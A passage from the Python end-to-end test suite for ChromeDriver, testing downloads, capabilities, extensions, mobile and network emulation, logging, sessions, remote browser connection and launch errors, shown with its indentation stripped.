self._handler.send_response_event.set()
self._LoadHangingUrl()
self.assertTrue(self._handler.request_received_event.wait(1))
self._CheckPageLoadTimeout(self._driver.Refresh)
class ChromeDriverAndroidTest(ChromeDriverBaseTest):
"""End to end tests for Android-specific tests."""
def testLatestAndroidAppInstalled(self):
if ('stable' not in _ANDROID_PACKAGE_KEY and
'beta' not in _ANDROID_PACKAGE_KEY):
return
self._driver = self.CreateDriver()
try:
omaha_list = json.loads(
six.moves.urllib.request.urlopen('http://omahaproxy.appspot.com/all.json').read())
for l in omaha_list:
if l['os'] != 'android':
continue
for v in l['versions']:
if (('stable' in v['channel'] and 'stable' in _ANDROID_PACKAGE_KEY) or
('beta' in v['channel'] and 'beta' in _ANDROID_PACKAGE_KEY)):
omaha = list(map(int, v['version'].split('.')))
device = list(map(int,
self._driver.capabilities['browserVersion'].split('.')))
self.assertTrue(omaha <= device)
return
raise RuntimeError('Malformed omaha JSON')
except six.moves.urllib.error.URLError as e:
print('Unable to fetch current version info from omahaproxy (%s)' % e)
def testDeviceManagement(self):
self._drivers = [self.CreateDriver()
for _ in device_utils.DeviceUtils.HealthyDevices()]
self.assertRaises(chromedriver.UnknownError, self.CreateDriver)
self._drivers[0].Quit()
self._drivers[0] = self.CreateDriver()
def testAndroidGetWindowSize(self):
self._driver = self.CreateDriver()
size = self._driver.GetWindowRect()
script_size = self._driver.ExecuteScript(
'return [window.outerWidth, window.outerHeight, 0, 0]')
self.assertEquals(size, script_size)
script_inner = self._driver.ExecuteScript(
'return [window.innerWidth * visualViewport.scale, '
'window.innerHeight * visualViewport.scale]')
# Subtract inner size by 1 to compensate for rounding errors.
self.assertLessEqual(script_inner[0] - 1, size[0])
self.assertLessEqual(script_inner[1] - 1, size[1])
# Sanity check: screen dimensions in the range 20-20000px
self.assertLessEqual(size[0], 20000)
self.assertLessEqual(size[1], 20000)
self.assertGreaterEqual(size[0], 20)
self.assertGreaterEqual(size[1], 20)
class ChromeDownloadDirTest(ChromeDriverBaseTest):
def __init__(self, *args, **kwargs):
super(ChromeDownloadDirTest, self).__init__(*args, **kwargs)
self._temp_dirs = []
def CreateTempDir(self):
temp_dir = tempfile.mkdtemp()
self._temp_dirs.append(temp_dir)
return temp_dir
def RespondWithCsvFile(self, request):
return {'Content-Type': 'text/csv'}, 'a,b,c\n1,2,3\n'
def WaitForFileToDownload(self, path):
deadline = monotonic() + 60
while True:
time.sleep(0.1)
if os.path.isfile(path) or monotonic() > deadline:
break
self.assertTrue(os.path.isfile(path), "Failed to download file!")
def tearDown(self):
# Call the superclass tearDown() method before deleting temp dirs, so that
# Chrome has a chance to exit before its user data dir is blown away from
# underneath it.
super(ChromeDownloadDirTest, self).tearDown()
for temp_dir in self._temp_dirs:
# Deleting temp dir can fail if Chrome hasn't yet fully exited and still
# has open files in there. So we ignore errors, and retry if necessary.
shutil.rmtree(temp_dir, ignore_errors=True)
retry = 0
while retry < 10 and os.path.exists(temp_dir):
time.sleep(0.1)
shutil.rmtree(temp_dir, ignore_errors=True)
def testFileDownloadWithClick(self):
download_dir = self.CreateTempDir()
download_name = os.path.join(download_dir, 'a_red_dot.png')
driver = self.CreateDriver(download_dir=download_dir)
driver.Load(ChromeDriverTest.GetHttpUrlForFile(
'/chromedriver/download.html'))
driver.FindElement('css selector', '#red-dot').Click()
self.WaitForFileToDownload(download_name)
self.assertEqual(
ChromeDriverTest.GetHttpUrlForFile('/chromedriver/download.html'),
driver.GetCurrentUrl())
def testFileDownloadWithClickHeadless(self):
download_dir = self.CreateTempDir()
download_name = os.path.join(download_dir, 'a_red_dot.png')
driver = self.CreateDriver(download_dir=download_dir,
chrome_switches=['--headless'])
driver.Load(ChromeDriverTest.GetHttpUrlForFile(
'/chromedriver/download.html'))
driver.FindElement('css selector', '#red-dot').Click()
self.WaitForFileToDownload(download_name)
self.assertEqual(
ChromeDriverTest.GetHttpUrlForFile('/chromedriver/download.html'),
driver.GetCurrentUrl())
def testFileDownloadAfterTabHeadless(self):
download_dir = self.CreateTempDir()
download_name = os.path.join(download_dir, 'a_red_dot.png')
driver = self.CreateDriver(download_dir=download_dir,
chrome_switches=['--headless'])
driver.Load(ChromeDriverTest.GetHttpUrlForFile(
'/chromedriver/empty.html'))
new_window = driver.NewWindow(window_type='tab')
driver.SwitchToWindow(new_window['handle'])
driver.Load(ChromeDriverTest.GetHttpUrlForFile(
'/chromedriver/download.html'))
driver.FindElement('css selector', '#red-dot').Click()
self.WaitForFileToDownload(download_name)
self.assertEqual(
ChromeDriverTest.GetHttpUrlForFile('/chromedriver/download.html'),
driver.GetCurrentUrl())
def testFileDownloadWithGet(self):
ChromeDriverTest._http_server.SetCallbackForPath(
'/abc.csv', self.RespondWithCsvFile)
download_dir = self.CreateTempDir()
driver = self.CreateDriver(download_dir=download_dir)
original_url = driver.GetCurrentUrl()
driver.Load(ChromeDriverTest.GetHttpUrlForFile('/abc.csv'))
self.WaitForFileToDownload(os.path.join(download_dir, 'abc.csv'))
self.assertEqual(original_url, driver.GetCurrentUrl())
def testFileDownloadWithGetHeadless(self):
ChromeDriverTest._http_server.SetCallbackForPath(
'/abc.csv', self.RespondWithCsvFile)
download_dir = self.CreateTempDir()
driver = self.CreateDriver(download_dir=download_dir,
chrome_switches=['--headless'])
original_url = driver.GetCurrentUrl()
driver.Load(ChromeDriverTest.GetHttpUrlForFile('/abc.csv'))
self.WaitForFileToDownload(os.path.join(download_dir, 'abc.csv'))
self.assertEqual(original_url, driver.GetCurrentUrl())
def testDownloadDirectoryOverridesExistingPreferences(self):
user_data_dir = self.CreateTempDir()
download_dir = self.CreateTempDir()
sub_dir = os.path.join(user_data_dir, 'Default')
os.mkdir(sub_dir)
prefs_file_path = os.path.join(sub_dir, 'Preferences')
prefs = {
'test': 'this should not be changed',
'download': {
'default_directory': '/old/download/directory'
}
}
with open(prefs_file_path, 'w') as f:
json.dump(prefs, f)
driver = self.CreateDriver(
chrome_switches=['user-data-dir=' + user_data_dir],
download_dir=download_dir)
with open(prefs_file_path) as f:
prefs = json.load(f)
self.assertEqual('this should not be changed', prefs['test'])
download = prefs['download']
self.assertEqual(download['default_directory'], download_dir)
class ChromeSwitchesCapabilityTest(ChromeDriverBaseTest):
"""Tests that chromedriver properly processes chromeOptions.args capabilities.
Makes sure the switches are passed to Chrome.
"""
def testSwitchWithoutArgument(self):
"""Tests that switch --dom-automation can be passed to Chrome.
Unless --dom-automation is specified, window.domAutomationController
is undefined.
"""
driver = self.CreateDriver(chrome_switches=['dom-automation'])
self.assertNotEqual(
None,
driver.ExecuteScript('return window.domAutomationController'))
def testRemoteDebuggingPort(self):
"""Tests that passing --remote-debugging-port through capabilities works.
"""
# Must use retries since there is an inherent race condition in port
# selection.
ports_generator = util.FindProbableFreePorts()
for _ in range(3):
port = next(ports_generator)
port_flag = 'remote-debugging-port=%s' % port
try:
driver = self.CreateDriver(chrome_switches=[port_flag])
except:
continue
driver.Load('chrome:version')
command_line = driver.FindElement('css selector',
'#command_line').GetText()
self.assertIn(port_flag, command_line)
break
else: # Else clause gets invoked if "break" never happens.
raise # This re-raises the most recent exception.
class ChromeDesiredCapabilityTest(ChromeDriverBaseTest):
"""Tests that chromedriver properly processes desired capabilities."""
def testDefaultTimeouts(self):
driver = self.CreateDriver()
timeouts = driver.GetTimeouts()
# Compare against defaults in W3C spec
self.assertEquals(timeouts['implicit'], 0)
self.assertEquals(timeouts['pageLoad'], 300000)
self.assertEquals(timeouts['script'], 30000)
def testTimeouts(self):
driver = self.CreateDriver(timeouts = {
'implicit': 123,
'pageLoad': 456,
'script': 789
})
timeouts = driver.GetTimeouts()
self.assertEquals(timeouts['implicit'], 123)
self.assertEquals(timeouts['pageLoad'], 456)
self.assertEquals(timeouts['script'], 789)
# Run in Legacy mode
def testUnexpectedAlertBehaviourLegacy(self):
driver = self.CreateDriver(unexpected_alert_behaviour="accept",
send_w3c_capability=False,
send_w3c_request=False)
self.assertEquals("accept",
driver.capabilities['unexpectedAlertBehaviour'])
driver.ExecuteScript('alert("HI");')
self.WaitForCondition(driver.IsAlertOpen)
self.assertRaisesRegexp(chromedriver.UnexpectedAlertOpen,
'unexpected alert open: {Alert text : HI}',
driver.FindElement, 'tag name', 'div')
self.assertFalse(driver.IsAlertOpen())
def testUnexpectedAlertBehaviourW3c(self):
driver = self.CreateDriver(unexpected_alert_behaviour='accept',
send_w3c_capability=True, send_w3c_request=True)
self.assertEquals('accept',
driver.capabilities['unhandledPromptBehavior'])
driver.ExecuteScript('alert("HI");')
self.WaitForCondition(driver.IsAlertOpen)
# With unhandledPromptBehavior=accept, calling GetTitle (and most other
# endpoints) automatically dismisses the alert, so IsAlertOpen() becomes
# False afterwards.
self.assertEquals(driver.GetTitle(), '')
self.assertFalse(driver.IsAlertOpen())
class ChromeExtensionsCapabilityTest(ChromeDriverBaseTestWithWebServer):
"""Tests that chromedriver properly processes chromeOptions.extensions."""
def _PackExtension(self, ext_path):
return base64.b64encode(open(ext_path, 'rb').read())
def testExtensionsInstall(self):
"""Checks that chromedriver can take the extensions in crx format."""
crx_1 = os.path.join(_TEST_DATA_DIR, 'ext_test_1.crx')
crx_2 = os.path.join(_TEST_DATA_DIR, 'ext_test_2.crx')
self.CreateDriver(chrome_extensions=[self._PackExtension(crx_1),
self._PackExtension(crx_2)])
def testExtensionsInstallZip(self):
"""Checks that chromedriver can take the extensions in zip format."""
zip_1 = os.path.join(_TEST_DATA_DIR, 'ext_test_1.zip')
self.CreateDriver(chrome_extensions=[self._PackExtension(zip_1)])
def testCanInspectBackgroundPage(self):
crx = os.path.join(_TEST_DATA_DIR, 'ext_bg_page.crx')
driver = self.CreateDriver(
chrome_extensions=[self._PackExtension(crx)],
experimental_options={'windowTypes': ['background_page']})
handles = driver.GetWindowHandles()
for handle in handles:
driver.SwitchToWindow(handle)
if driver.GetCurrentUrl() == 'chrome-extension://' \
'nibbphkelpaohebejnbojjalikodckih/_generated_background_page.html':
self.assertEqual(42, driver.ExecuteScript('return magic;'))
return
self.fail("couldn't find generated background page for test extension")
def testIFrameWithExtensionsSource(self):
crx_path = os.path.join(_TEST_DATA_DIR, 'frames_extension.crx')
driver = self.CreateDriver(
chrome_extensions=[self._PackExtension(crx_path)])
driver.Load(
ChromeDriverTest._http_server.GetUrl() +
'/chromedriver/iframe_extension.html')
driver.SwitchToFrame('testframe')
element = driver.FindElement('css selector', '#p1')
self.assertEqual('Its a frame with extension source', element.GetText())
def testDontExecuteScriptsInContentScriptContext(self):
# This test extension has a content script which runs in all frames (see
# https://developer.chrome.com/extensions/content_scripts) which causes each
# frame on the page to be associated with multiple JS execution contexts.
# Make sure that ExecuteScript operates on the page's context, rather than
# the extension's content script's one.
extension_path = os.path.join(_TEST_DATA_DIR, 'all_frames')
driver = self.CreateDriver(
chrome_switches=['load-extension=%s' % extension_path])
driver.Load(
ChromeDriverTest._http_server.GetUrl() + '/chromedriver/container.html')
driver.SwitchToMainFrame()
self.assertEqual('one', driver.ExecuteScript("return window['global_var']"))
driver.SwitchToFrame('iframe')
self.assertEqual('two', driver.ExecuteScript("return window['iframe_var']"))
class ChromeLogPathCapabilityTest(ChromeDriverBaseTest):
"""Tests that chromedriver properly processes chromeOptions.logPath."""
LOG_MESSAGE = 'Welcome to ChromeLogPathCapabilityTest!'
def testChromeLogPath(self):
"""Checks that user can specify the path of the chrome log.
Verifies that a log message is written into the specified log file.
"""
tmp_log_path = tempfile.NamedTemporaryFile()
driver = self.CreateDriver(chrome_log_path=tmp_log_path.name)
driver.ExecuteScript('console.info("%s")' % self.LOG_MESSAGE)
driver.Quit()
self.assertTrue(self.LOG_MESSAGE in open(tmp_log_path.name).read())
class MobileEmulationCapabilityTest(ChromeDriverBaseTestWithWebServer):
"""Tests that ChromeDriver processes chromeOptions.mobileEmulation.
Makes sure the device metrics are overridden in DevTools and user agent is
overridden in Chrome.
"""
# Run in Legacy mode
def testDeviceMetricsWithStandardWidth(self):
driver = self.CreateDriver(
send_w3c_capability=False, send_w3c_request=False,
mobile_emulation = {
'deviceMetrics': {'width': 360, 'height': 640, 'pixelRatio': 3},
'userAgent': 'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Bui'
'ld/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko) Chr'
'ome/18.0.1025.166 Mobile Safari/535.19'
})
driver.SetWindowRect(600, 400, None, None)
driver.Load(self._http_server.GetUrl() + '/userAgent')
self.assertTrue(driver.capabilities['mobileEmulationEnabled'])
self.assertEqual(360, driver.ExecuteScript('return window.screen.width'))
self.assertEqual(640, driver.ExecuteScript('return window.screen.height'))
# Run in Legacy mode
def testDeviceMetricsWithDeviceWidth(self):
driver = self.CreateDriver(
send_w3c_capability=False, send_w3c_request=False,
mobile_emulation = {
'deviceMetrics': {'width': 360, 'height': 640, 'pixelRatio': 3},
'userAgent': 'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Bui'
'ld/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko) Chr'
'ome/18.0.1025.166 Mobile Safari/535.19'
})
driver.Load(self._http_server.GetUrl() + '/userAgentUseDeviceWidth')
self.assertTrue(driver.capabilities['mobileEmulationEnabled'])
self.assertEqual(360, driver.ExecuteScript('return window.screen.width'))
self.assertEqual(640, driver.ExecuteScript('return window.screen.height'))
def testUserAgent(self):
driver = self.CreateDriver(
mobile_emulation = {'userAgent': 'Agent Smith'})
driver.Load(self._http_server.GetUrl() + '/userAgent')
body_tag = driver.FindElement('tag name', 'body')
self.assertEqual("Agent Smith", body_tag.GetText())
def testDeviceName(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Nexus 5'})
driver.Load(self._http_server.GetUrl() + '/userAgentUseDeviceWidth')
self.assertEqual(360, driver.ExecuteScript('return window.screen.width'))
self.assertEqual(640, driver.ExecuteScript('return window.screen.height'))
body_tag = driver.FindElement('tag name', 'body')
self.assertRegexpMatches(
body_tag.GetText(),
'^' +
re.escape('Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) '
'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/') +
r'\d+\.\d+\.\d+\.\d+' +
re.escape(' Mobile Safari/537.36') + '$')
def testSendKeysToElement(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Nexus 5'})
text = driver.ExecuteScript(
'document.body.innerHTML = \'<input type="text">\';'
'var input = document.getElementsByTagName("input")[0];'
'input.addEventListener("change", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return input;')
text.SendKeys('0123456789+-*/ Hi')
text.SendKeys(', there!')
value = driver.ExecuteScript('return arguments[0].value;', text)
self.assertEquals('0123456789+-*/ Hi, there!', value)
def testClickElement(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Nexus 5'})
driver.Load('about:blank')
div = driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("click", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
div.Click()
self.assertEquals(1, len(driver.FindElements('tag name', 'br')))
# Run in Legacy mode
def testTapElement(self):
driver = self.CreateDriver(
send_w3c_capability=False, send_w3c_request=False,
mobile_emulation = {'deviceName': 'Nexus 5'})
driver.Load('about:blank')
div = driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchstart", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
div.SingleTap()
self.assertEquals(1, len(driver.FindElements('tag name', 'br')))
def testNetworkConnectionDisabledByDefault(self):
driver = self.CreateDriver()
self.assertFalse(driver.capabilities['networkConnectionEnabled'])
def testNetworkConnectionUnsupported(self):
driver = self.CreateDriver()
# Network connection capability must be enabled to set/retrieve
self.assertRaises(chromedriver.UnknownError,
driver.GetNetworkConnection)
self.assertRaises(chromedriver.UnknownError,
driver.SetNetworkConnection, 0x1)
# Run in Legacy mode
def testNetworkConnectionEnabled(self):
# mobileEmulation must be enabled for networkConnection to be enabled
driver = self.CreateDriver(
mobile_emulation={'deviceName': 'Nexus 5'},
network_connection=True,
send_w3c_capability=False, send_w3c_request=False)
self.assertTrue(driver.capabilities['mobileEmulationEnabled'])
self.assertTrue(driver.capabilities['networkConnectionEnabled'])
def testEmulateNetworkConnection4g(self):
driver = self.CreateDriver(
mobile_emulation={'deviceName': 'Nexus 5'},
network_connection=True)
# Test 4G connection.
connection_type = 0x8
returned_type = driver.SetNetworkConnection(connection_type)
self.assertEquals(connection_type, returned_type)
network = driver.GetNetworkConnection()
self.assertEquals(network, connection_type)
def testEmulateNetworkConnectionMultipleBits(self):
driver = self.CreateDriver(
mobile_emulation={'deviceName': 'Nexus 5'},
network_connection=True)
# Connection with 4G, 3G, and 2G bits on.
# Tests that 4G takes precedence.
connection_type = 0x38
returned_type = driver.SetNetworkConnection(connection_type)
self.assertEquals(connection_type, returned_type)
network = driver.GetNetworkConnection()
self.assertEquals(network, connection_type)
def testWifiAndAirplaneModeEmulation(self):
driver = self.CreateDriver(
mobile_emulation={'deviceName': 'Nexus 5'},
network_connection=True)
# Connection with both Wifi and Airplane Mode on.
# Tests that Wifi takes precedence over Airplane Mode.
connection_type = 0x3
returned_type = driver.SetNetworkConnection(connection_type)
self.assertEquals(connection_type, returned_type)
network = driver.GetNetworkConnection()
self.assertEquals(network, connection_type)
def testNetworkConnectionTypeIsAppliedToAllTabsImmediately(self):
def respondWithString(request):
return {}, """
<html>
<body>%s</body>
</html>""" % "hello world!"
self._http_server.SetCallbackForPath(
'/helloworld', respondWithString)
driver = self.CreateDriver(
mobile_emulation={'deviceName': 'Nexus 5'},
network_connection=True)
# Set network to online
connection_type = 0x10
returned_type = driver.SetNetworkConnection(connection_type)
self.assertEquals(connection_type, returned_type)
# Open a window with two divs counting successful + unsuccessful
# attempts to complete XML task
driver.Load(
self._http_server.GetUrl() +'/chromedriver/xmlrequest_test.html')
window1_handle = driver.GetCurrentWindowHandle()
old_handles = driver.GetWindowHandles()
driver.FindElement('css selector', '#requestButton').Click()
driver.FindElement('css selector', '#link').Click()
new_window_handle = self.WaitForNewWindow(driver, old_handles)
self.assertNotEqual(None, new_window_handle)
driver.SwitchToWindow(new_window_handle)
self.assertEquals(new_window_handle, driver.GetCurrentWindowHandle())
# Set network to offline to determine whether the XML task continues to
# run in the background, indicating that the conditions are only applied
# to the current WebView
connection_type = 0x1
returned_type = driver.SetNetworkConnection(connection_type)
self.assertEquals(connection_type, returned_type)
driver.SwitchToWindow(window1_handle)
connection_type = 0x1
def testNetworkConnectionTypeIsAppliedToAllTabs(self):
driver = self.CreateDriver(
mobile_emulation={'deviceName': 'Nexus 5'},
network_connection=True)
driver.Load(self._http_server.GetUrl() +'/chromedriver/page_test.html')
window1_handle = driver.GetCurrentWindowHandle()
old_handles = driver.GetWindowHandles()
# Test connection is offline.
connection_type = 0x1;
returned_type = driver.SetNetworkConnection(connection_type)
self.assertEquals(connection_type, returned_type)
network = driver.GetNetworkConnection()
self.assertEquals(network, connection_type)
# Navigate to another window.
driver.FindElement('css selector', '#link').Click()
new_window_handle = self.WaitForNewWindow(driver, old_handles)
self.assertNotEqual(None, new_window_handle)
driver.SwitchToWindow(new_window_handle)
self.assertEquals(new_window_handle, driver.GetCurrentWindowHandle())
self.assertRaises(
chromedriver.NoSuchElement, driver.FindElement, 'css selector', '#link')
# Set connection to 3G in second window.
connection_type = 0x10;
returned_type = driver.SetNetworkConnection(connection_type)
self.assertEquals(connection_type, returned_type)
driver.SwitchToWindow(window1_handle)
self.assertEquals(window1_handle, driver.GetCurrentWindowHandle())
# Test whether first window has old or new network conditions.
network = driver.GetNetworkConnection()
self.assertEquals(network, connection_type)
def testDefaultComplianceMode(self):
driver = self.CreateDriver(send_w3c_capability=None,
send_w3c_request=True)
self.assertTrue(driver.w3c_compliant)
def testW3cCompliantResponses(self):
# It's an error to send Legacy format request
# without Legacy capability flag.
with self.assertRaises(chromedriver.InvalidArgument):
self.CreateDriver(send_w3c_request=False)
# It's an error to send Legacy format capability
# without Legacy request flag.
with self.assertRaises(chromedriver.SessionNotCreated):
self.CreateDriver(send_w3c_capability=False)
# Can enable W3C capability in a W3C format request.
driver = self.CreateDriver(send_w3c_capability=True)
self.assertTrue(driver.w3c_compliant)
# Can enable W3C request in a legacy format request.
driver = self.CreateDriver(send_w3c_request=True)
self.assertTrue(driver.w3c_compliant)
# Asserts that errors are being raised correctly in the test client
# with a W3C compliant driver.
self.assertRaises(chromedriver.UnknownError,
driver.GetNetworkConnection)
# Can set Legacy capability flag in a Legacy format request.
driver = self.CreateDriver(send_w3c_capability=False,
send_w3c_request=False)
self.assertFalse(driver.w3c_compliant)
class ChromeDriverLogTest(ChromeDriverBaseTest):
"""Tests that chromedriver produces the expected log file."""
UNEXPECTED_CHROMEOPTION_CAP = 'unexpected_chromeoption_capability'
LOG_MESSAGE = 'unrecognized chrome option: %s' % UNEXPECTED_CHROMEOPTION_CAP
def testChromeDriverLog(self):
_, tmp_log_path = tempfile.mkstemp(prefix='chromedriver_log_')
chromedriver_server = server.Server(
_CHROMEDRIVER_BINARY, log_path=tmp_log_path)
try:
driver = chromedriver.ChromeDriver(
chromedriver_server.GetUrl(), chromedriver_server.GetPid(),
chrome_binary=_CHROME_BINARY,
experimental_options={ self.UNEXPECTED_CHROMEOPTION_CAP : 1 })
driver.Quit()
except chromedriver.ChromeDriverException as e:
self.assertTrue(self.LOG_MESSAGE in e.message)
finally:
chromedriver_server.Kill()
with open(tmp_log_path, 'r') as f:
self.assertTrue(self.LOG_MESSAGE in f.read())
def testDisablingDriverLogsSuppressesChromeDriverLog(self):
_, tmp_log_path = tempfile.mkstemp(prefix='chromedriver_log_')
chromedriver_server = server.Server(
_CHROMEDRIVER_BINARY, log_path=tmp_log_path, verbose=False)
try:
driver = self.CreateDriver(
chromedriver_server.GetUrl(), logging_prefs={'driver':'OFF'})
driver.Load(
ChromeDriverTest._http_server.GetUrl() + '/chromedriver/empty.html')
driver.AddCookie({'name': 'secret_code', 'value': 'bosco'})
driver.Quit()
finally:
chromedriver_server.Kill()
with open(tmp_log_path, 'r') as f:
self.assertNotIn('bosco', f.read())
class ChromeLoggingCapabilityTest(ChromeDriverBaseTest):
"""Tests chromedriver tracing support and Inspector event collection."""
def testPerformanceLogger(self):
driver = self.CreateDriver(
experimental_options={'perfLoggingPrefs': {
'traceCategories': 'blink.console'
}}, logging_prefs={'performance':'ALL'})
driver.Load(
ChromeDriverTest._http_server.GetUrl() + '/chromedriver/empty.html')
# Mark the timeline; later we will verify the marks appear in the trace.
driver.ExecuteScript('console.time("foobar")')
driver.ExecuteScript('console.timeEnd("foobar")')
logs = driver.GetLog('performance')
driver.Quit()
marked_timeline_events = []
seen_log_domains = {}
for entry in logs:
devtools_message = json.loads(entry['message'])['message']
method = devtools_message['method']
domain = method[:method.find('.')]
seen_log_domains[domain] = True
if method != 'Tracing.dataCollected':
continue
self.assertTrue('params' in devtools_message)
self.assertTrue(isinstance(devtools_message['params'], dict))
cat = devtools_message['params'].get('cat', '')
if (cat == 'blink.console' and
devtools_message['params']['name'] == 'foobar'):
marked_timeline_events.append(devtools_message)
self.assertEquals(2, len(marked_timeline_events))
self.assertEquals({'Network', 'Page', 'Tracing'},
set(seen_log_domains.keys()))
def testDevToolsEventsLogger(self):
"""Tests that the correct event type (and no other) is logged"""
event = 'Page.loadEventFired'
driver = self.CreateDriver(
devtools_events_to_log=[event], logging_prefs={'devtools':'ALL'})
driver.Load('about:blank')
logs = driver.GetLog('devtools')
for entry in logs:
devtools_message = json.loads(entry['message'])
method = devtools_message['method']
self.assertTrue('params' in devtools_message)
self.assertEquals(event, method)
class SessionHandlingTest(ChromeDriverBaseTest):
"""Tests for session operations."""
def testQuitASessionMoreThanOnce(self):
driver = self.CreateDriver()
driver.Quit()
driver.Quit()
def testGetSessions(self):
driver = self.CreateDriver()
response = driver.GetSessions()
self.assertEqual(1, len(response))
driver2 = self.CreateDriver()
response = driver2.GetSessions()
self.assertEqual(2, len(response))
class RemoteBrowserTest(ChromeDriverBaseTest):
"""Tests for ChromeDriver remote browser capability."""
def setUp(self):
self.assertTrue(_CHROME_BINARY is not None,
'must supply a chrome binary arg')
def testConnectToRemoteBrowser(self):
# Must use retries since there is an inherent race condition in port
# selection.
ports_generator = util.FindProbableFreePorts()
for _ in range(3):
port = next(ports_generator)
temp_dir = util.MakeTempDir()
print('temp dir is ' + temp_dir)
cmd = [_CHROME_BINARY,
'--remote-debugging-port=%d' % port,
'--user-data-dir=%s' % temp_dir,
'--use-mock-keychain']
process = subprocess.Popen(cmd)
try:
driver = self.CreateDriver(debugger_address='localhost:%d' % port)
driver.ExecuteScript('console.info("%s")' % 'connecting at %d!' % port)
driver.Quit()
except:
continue
finally:
if process.poll() is None:
process.terminate()
# Wait for Chrome to exit here to prevent a race with Chrome to
# delete/modify the temporary user-data-dir.
# Maximum wait ~1 second.
for _ in range(20):
if process.poll() is not None:
break
print('continuing to wait for Chrome to exit')
time.sleep(.05)
else:
process.kill()
break
else: # Else clause gets invoked if "break" never happens.
raise # This re-raises the most recent exception.
def testConnectToRemoteBrowserLiteralAddressHeadless(self):
debug_addrs = ['127.0.0.1', '::1']
debug_url_addrs = ['127.0.0.1', '[::1]']
for (debug_addr, debug_url_addr) in zip(debug_addrs, debug_url_addrs):
# Must use retries since there is an inherent race condition in port
# selection.
ports_generator = util.FindProbableFreePorts()
for _ in range(3):
port = next(ports_generator)
temp_dir = util.MakeTempDir()
print('temp dir is ' + temp_dir)
cmd = [_CHROME_BINARY,
'--headless',
'--remote-debugging-address=%s' % debug_addr,
'--remote-debugging-port=%d' % port,
'--user-data-dir=%s' % temp_dir,
'--use-mock-keychain']
process = subprocess.Popen(cmd)
try:
driver = self.CreateDriver(
debugger_address='%s:%d' % (debug_url_addr, port))
driver.ExecuteScript(
'console.info("%s")' % 'connecting at %d!' % port)
driver.Quit()
except:
continue
finally:
if process.poll() is None:
process.terminate()
# Wait for Chrome to exit here to prevent a race with Chrome to
# delete/modify the temporary user-data-dir.
# Maximum wait ~1 second.
for _ in range(20):
if process.poll() is not None:
break
print('continuing to wait for Chrome to exit')
time.sleep(.05)
else:
process.kill()
break
else: # Else clause gets invoked if "break" never happens.
raise # This re-raises the most recent exception.
class LaunchDesktopTest(ChromeDriverBaseTest):
"""Tests that launching desktop Chrome works."""
def testExistingDevToolsPortFile(self):
"""If a DevTools port file already exists before startup, then we should
ignore it and get our debug port number from the new file."""
user_data_dir = tempfile.mkdtemp()
try:
dev_tools_port_file = os.path.join(user_data_dir, 'DevToolsActivePort')
with open(dev_tools_port_file, 'w') as fd:
fd.write('34\n/devtools/browser/2dab5fb1-5571-40d8-a6ad-98823bc5ff84')
driver = self.CreateDriver(
chrome_switches=['user-data-dir=' + user_data_dir])
with open(dev_tools_port_file, 'r') as fd:
port = int(fd.readlines()[0])
# Ephemeral ports are always high numbers.
self.assertTrue(port > 100)
finally:
shutil.rmtree(user_data_dir, ignore_errors=True)
def testHelpfulErrorMessage_NormalExit(self):
"""If Chrome fails to start, we should provide a useful error message."""
if util.IsWindows():
# Not bothering implementing a Windows test since then I would have
# to implement Windows-specific code for a program that quits and ignores
# any arguments. Linux and Mac should be good enough coverage.
return
file_descriptor, path = tempfile.mkstemp()
try:
os.write(file_descriptor, '#!/bin/bash\nexit 0')
os.close(file_descriptor)
os.chmod(path, 0o777)
exception_raised = False
try:
driver = chromedriver.ChromeDriver(_CHROMEDRIVER_SERVER_URL,
_CHROMEDRIVER_SERVER_PID,
chrome_binary=path,
test_name=self.id())
except Exception as e:
self.assertIn('Chrome failed to start', e.message)
self.assertIn('exited normally', e.message)
self.assertIn('ChromeDriver is assuming that Chrome has crashed',
e.message)
exception_raised = True
self.assertTrue(exception_raised)
try:
driver.Quit()
except:
pass
finally:
pass
os.remove(path)
def testNoBinaryErrorMessage(self):
temp_dir = tempfile.mkdtemp()
exception_raised = False
try:
driver = chromedriver.ChromeDriver(
_CHROMEDRIVER_SERVER_URL,
_CHROMEDRIVER_SERVER_PID,
chrome_binary=os.path.join(temp_dir, 'this_file_should_not_exist'),
test_name=self.id())
except Exception as e:
self.assertIn('no chrome binary', e.message)
exception_raised = True
finally:
shutil.rmtree(temp_dir)
self.assertTrue(exception_raised)
class PerfTest(ChromeDriverBaseTest):
"""Tests for ChromeDriver perf."""
def _RunDriverPerfTest(self, name, test_func):
"""Runs a perf test ChromeDriver server.
Args:
name: The name of the perf test.
test_func: Called with the server url to perform the test action. Must
return the time elapsed.
"""
result = []
for iteration in range(10):
result += [test_func(_CHROMEDRIVER_SERVER_URL)]
def PrintResult(result):
mean = sum(result) / len(result)
avg_dev = sum([abs(sample - mean) for sample in result]) / len(result)
print('perf result', name, mean, avg_dev, result)
util.AddBuildStepText('%s: %.3f+-%.3f' % (
name, mean, avg_dev))
# Discard first result, which may be off due to cold start.
PrintResult(result[1:])
def testSessionStartTime(self):
def Run(url):
start = monotonic()
driver = self.CreateDriver(url)
end = monotonic()
driver.Quit()
return end - start
self._RunDriverPerfTest('session start', Run)
def testSessionStopTime(self):
def Run(url):
driver = self.CreateDriver(url)
start = monotonic()
driver.Quit()
end = monotonic()
return end - start
self._RunDriverPerfTest('session stop', Run)
def testColdExecuteScript(self):
def Run(url):
driver = self.CreateDriver(url)
start = monotonic()
driver.ExecuteScript('return 1')
end = monotonic()
driver.Quit()
return end - start
self._RunDriverPerfTest('cold exe js', Run)
class HeadlessInvalidCertificateTest(ChromeDriverBaseTestWithWebServer):
"""End to end tests for ChromeDriver."""
@staticmethod
def GetHttpsUrlForFile(file_path):
return (
HeadlessInvalidCertificateTest._https_server.GetUrl() + file_path)
